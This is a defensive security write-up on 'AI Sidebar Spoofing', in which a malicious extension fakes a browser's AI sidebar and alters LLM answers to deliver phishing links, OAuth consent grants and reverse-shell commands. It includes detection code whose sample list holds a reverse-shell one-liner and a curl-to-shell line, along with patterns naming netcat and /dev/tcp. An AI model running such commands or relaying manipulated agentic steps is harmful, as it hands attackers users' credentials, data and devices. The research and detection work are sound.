

SquareX Labs demonstrates a practical, low-friction attack class called AI Sidebar Spoofing, in which a malicious browser extension or attacker-controlled page injects a visually identical, interactive AI sidebar into the browser UI, relays user prompts to a real LLM, and selectively manipulates procedural responses to enable credential theft, OAuth consent abuse leading to data exfiltration, remote code execution, and device takeover. The technique exploits trusted UX, commonplace extension permissions, and agentic AI workflows that can act with the same privileges as the human operator. According to the research, the attack is reproducible and applies broadly across modern AI-enabled browsers.

SquareX Labs published experiments showing that a browser extension with common permissions (host + storage) can inject a DOM-based, pixel-perfect fake AI sidebar that users cannot reliably distinguish from a vendor-provided AI sidebar. The attacker wires the fake UI to a legitimate LLM (to keep answers plausible), and conditionally alters steps when the user requests instruction-like or agentic flows. Those manipulated steps include typosquatted phishing links, OAuth consent flows to attacker apps, and command-lines embedding reverse-shells — all of which rely on user trust and the habit of copying/pasting from the browser to terminal or navigating to recommended links. The research contains three reproducible case studies: crypto wallet phishing, OAuth consent (file/GDrive/Gmail exfiltration), and device hijack via reverse shell instructions.

Why this attack matters

- Trusted UI abuse: The attack abuses visual trust. AI sidebars are now a characteristic, familiar element of multiple browsers; spoofing that element collapses the primary human heuristic (“this is the official AI assistant”).

- Low privilege, high impact: Only common extension permissions are required; no kernel exploit or complex supply-chain compromise is needed. Widely used extensions such as Grammarly or password managers often need host access, which makes the permission vector realistic.

- Agentic escalation: Many AI browsers and agents can perform multi-step actions that mimic a user (open links, follow dialogs, initiate OAuth). Agentic workflows transform a UI spoof into automated real-world impact (credentials, consent, remote code).

- Enterprise gaps: BYOD and unmanaged endpoints reduce coverage for EDR and DLP; network controls (SSE/SASE) may miss malicious UI-level interactions and clipboard-based command paste actions.

Technical anatomy — techniques used in the research (detailed)

Below I break down each technique the researchers implemented, how it works, why it succeeds, and what signals it produces.

1. Malicious extension distribution / acquisition

Technique: Publish a malicious extension disguised as a productivity/AI utility, or take over a legitimate extension (compromise/purchase).

Why it works: Extension stores are a high-volume channel; lightweight productivity add-ons commonly request host and storage permissions. Organizations frequently lack rigorous extension governance on endpoints.

Detection signals: new extension installs or updates with broad host permissions (e.g., <all_urls>), extensions with sudden change in publisher metadata, or previously benign extensions with newly added host/storage permissions.
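The permission signals above can be checked against extension manifests collected from endpoints. The following is a minimal sketch, assuming each manifest.json has already been parsed into a dictionary and that a previous version is available for comparison; the function names `host_patterns` and `audit_manifest` are illustrative and not part of the SquareX research.

```python
from __future__ import annotations

# Match patterns that grant access to every site.
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def host_patterns(manifest: dict) -> set[str]:
    """Collect host match patterns from a parsed manifest.json (MV2 or MV3)."""
    patterns = set(manifest.get("host_permissions", []))  # MV3 key
    # MV2 lists host patterns alongside API permissions under "permissions".
    patterns |= {p for p in manifest.get("permissions", [])
                 if p == "<all_urls>" or "://" in p}
    for script in manifest.get("content_scripts", []):
        patterns |= set(script.get("matches", []))
    return patterns


def audit_manifest(manifest: dict, previous: dict | None = None) -> list[str]:
    """Return human-readable findings for one extension version.

    `previous` is the manifest of the last reviewed version, if any
    (hypothetical input: how versions are archived is up to the inventory tool).
    """
    findings = []
    current = host_patterns(manifest)

    broad = sorted(current & BROAD_HOST_PATTERNS)
    if broad:
        findings.append("broad host access: " + ", ".join(broad))

    if previous is not None:
        added_hosts = sorted(current - host_patterns(previous))
        if added_hosts:
            findings.append("host patterns added: " + ", ".join(added_hosts))
        added_perms = sorted(set(manifest.get("permissions", []))
                             - set(previous.get("permissions", [])))
        if added_perms:
            findings.append("permissions added: " + ", ".join(added_perms))
    return findings
```

A finding here is a prompt for review rather than proof of malice, since many legitimate extensions also request broad host access.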

2. DOM injection & UI mimicry (spoofed sidebar creation)

Technique: Inject HTML/CSS/JS into pages to render a sidebar that reproduces vendor UI semantics and CSS, including interactive widgets and input boxes. The injected sidebar either visually replaces or sits beside the real AI sidebar.

Why it works: Browser extensions with host access can execute scripts in page contexts, manipulate the DOM, and inject styles. Users rely on familiar UI placement and affordances to infer authenticity, so a one-to-one mimic produces immediate trust.

Signals to hunt: Unexpected iframes/divs with inline scripts originating from non-vendor origins, inconsistent CSP headers, DOM elements that replicate vendor classes but whose script source is extension-owned.

3. LLM proxying and selective response manipulation

Technique: The extension proxies user prompts to a legitimate LLM (e.g., Gemini / Atlas / other), returns realistic responses, but inspects the prompt for instruction-oriented queries and replaces or augments critical steps with attacker-chosen artifacts (phishing URIs, OAuth redirect URLs, base64-encoded reverse-shell snippets).

Why it works: Keeping most of the LLM output intact preserves plausibility and reduces user suspicion; selective surgical edits are high-impact while remaining low-noise.

Forensic artifacts: proxied LLM API calls (to external LLM endpoints) originating from user devices; modified response payloads stored or logged by extension; mismatches between expected vendor response headers and actual script origins.

4. Typosquatting + tailored phishing pages

Technique: Replace benign links (e.g., binance[.]com) with typosquatted domains (e.g., binacee) in the fake sidebar output and/or craft phishing pages that look identical and can harvest credentials or session tokens (Evilginx-style proxies to bypass MFA).

Why it works: Users following step-by-step instructions from an authoritative-seeming AI are prone to click and log in without close inspection. Typosquatting domains are cheap and easily hosted.

Detection signals: DNS queries or HTTP(S) SNI to newly-registered, visually similar domains; session replays from external IPs shortly after user logins.
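One way to surface visually similar domains in DNS or proxy logs is to compare each observed domain against a watch list using edit distance. The sketch below assumes a small, hand-maintained list of protected domains (`PROTECTED` is hypothetical) and a distance threshold of 2; both would need tuning in practice.

```python
from __future__ import annotations


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance computed with a two-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        curr = [i]
        for j, cb in enumerate(b, start=1):
            cost = 0 if ca == cb else 1
            curr.append(min(prev[j] + 1,          # deletion
                            curr[j - 1] + 1,      # insertion
                            prev[j - 1] + cost))  # substitution or match
        prev = curr
    return prev[-1]


# Hypothetical watch list of services the organisation cares about.
PROTECTED = ["binance.com", "google.com"]


def lookalike_of(domain: str, protected: list[str] = PROTECTED,
                 max_distance: int = 2) -> str | None:
    """Return the protected domain that `domain` imitates, or None."""
    domain = domain.lower().rstrip(".")
    # Exact matches and genuine subdomains are not lookalikes.
    for legit in protected:
        if domain == legit or domain.endswith("." + legit):
            return None
    for legit in protected:
        if 0 < edit_distance(domain, legit) <= max_distance:
            return legit
    return None
```

With this watch list, `lookalike_of("binacee.com")` returns `"binance.com"`. The comparison uses the full domain string, so a lookalike hidden behind an extra subdomain would need the registrable domain extracted first.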

5. OAuth consent phishing (consent-grant flow hijack)

Technique: The spoofed sidebar recommends a “file sharing app” or service that triggers an OAuth “Sign in with Google” flow. The attacker’s OAuth client requests broad scopes (Drive, Gmail) and, once consented, gains API-level access to mailbox and drive contents.

Why it works: Users often consent to app permissions to reach a feature quickly; the sidebar’s authority accelerates consent. OAuth scopes are powerful — once granted, many cloud APIs become accessible for exfiltration.

Detection signals: New OAuth client authorizations for users, especially clients requesting high-risk scopes; newly created client IDs; admin console alerts for third-party app authorizations.
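These signals can be combined into a simple triage rule over OAuth grant events. The sketch below assumes the events have already been exported from an identity provider's audit log into dictionaries with `user`, `client_id`, and `scopes` fields; those field names and the severity labels are assumptions for illustration, while the scope URLs are standard Google Drive and Gmail scopes.

```python
from __future__ import annotations

# Google scopes that expose mailbox or Drive contents.
HIGH_RISK_SCOPES = {
    "https://mail.google.com/",
    "https://www.googleapis.com/auth/gmail.readonly",
    "https://www.googleapis.com/auth/gmail.modify",
    "https://www.googleapis.com/auth/drive",
    "https://www.googleapis.com/auth/drive.readonly",
}


def triage_grants(events: list[dict], known_client_ids: set[str]) -> list[dict]:
    """Flag grants to first-seen clients and grants of high-risk scopes.

    `events` uses a hypothetical schema: {"user", "client_id", "scopes"}.
    `known_client_ids` is the organisation's list of already-approved clients.
    """
    alerts = []
    for event in events:
        risky = sorted(set(event["scopes"]) & HIGH_RISK_SCOPES)
        first_seen = event["client_id"] not in known_client_ids
        if risky and first_seen:
            severity = "high"      # unknown app asking for mail or files
        elif risky or first_seen:
            severity = "medium"
        else:
            continue               # approved client, low-risk scopes
        alerts.append({
            "user": event["user"],
            "client_id": event["client_id"],
            "risky_scopes": risky,
            "first_seen": first_seen,
            "severity": severity,
        })
    return alerts
```

Treating the combination of a first-seen client and a high-risk scope as the highest severity reflects the consent-phishing pattern described above, where the attacker's app is both new to the tenant and broadly scoped.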

6. Command-line manipulation / reverse-shell embedding

Technique: The fake sidebar returns an otherwise-correct procedure (e.g., install Homebrew) but substitutes the installation command with a crafted command that, when pasted, establishes a reverse shell (often obfuscated or base64-encoded). Alternatively, the sidebar recommends installing a malicious package or dependency.

Why it works: Users frequently copy/paste commands from web pages into terminals; slight alterations can hide malicious intent while preserving superficial plausibility.

Detection signals: Paste events followed by terminal sessions initiating outbound TCP connections to unusual IPs/ports, abnormal process trees (e.g., bash spawning nc, curl | sh), or base64 decode operations in shells.
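The command patterns named above can be approximated with a few regular expressions applied to pasted text or shell history. This is a rough sketch, not a complete detector: the pattern set and the `screen_command` helper are illustrative assumptions, and obfuscated commands will evade simple matching.

```python
import re

# Label -> pattern for shell idioms commonly seen in reverse-shell one-liners.
SUSPICIOUS_PATTERNS = {
    "pipe download to shell": re.compile(
        r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z|da)?sh\b"),
    "base64 decode": re.compile(r"\bbase64\s+(-d|-D|--decode)\b"),
    "netcat with exec": re.compile(r"\b(nc|ncat|netcat)\b.*\s-(e|c)\b"),
    "bash /dev/tcp socket": re.compile(r"/dev/tcp/"),
}


def screen_command(command: str) -> list:
    """Return the labels of every suspicious pattern found in `command`."""
    return [label for label, pattern in SUSPICIOUS_PATTERNS.items()
            if pattern.search(command)]


if __name__ == "__main__":
    samples = [
        "brew install wget",
        "curl -fsSL https://example.com/install.sh | sh",
        "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1",
    ]
    for sample in samples:
        print(sample, "->", screen_command(sample) or "no match")
```

Some legitimate installers also pipe a download into a shell, so a match is better suited to triggering a confirmation prompt or an alert than to blocking outright.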

Mitigations and defensive playbook

Key controls:

- Enterprise extension allowlisting / blocklisting: block non-approved extensions by policy (GPO/MDM). Audit extension inventories regularly and perform dynamic behavioral analysis rather than metadata-only reviews.

- OAuth app governance: enforce allow-lists and require admin approval for apps requesting high-risk scopes (Drive, Gmail). Monitor new OAuth grants and alert on first-seen clients.

- Clipboard/command controls: warn or block copy/paste of suspicious shell commands (e.g., curl | sh, base64 blobs, nc/reverse shell patterns). Implement a UI friction step for pasting executable commands on managed machines.

- Network & DNS filtering: block recently registered domains and domains within a small edit distance of critical services; use ML heuristics for phishing page detection.
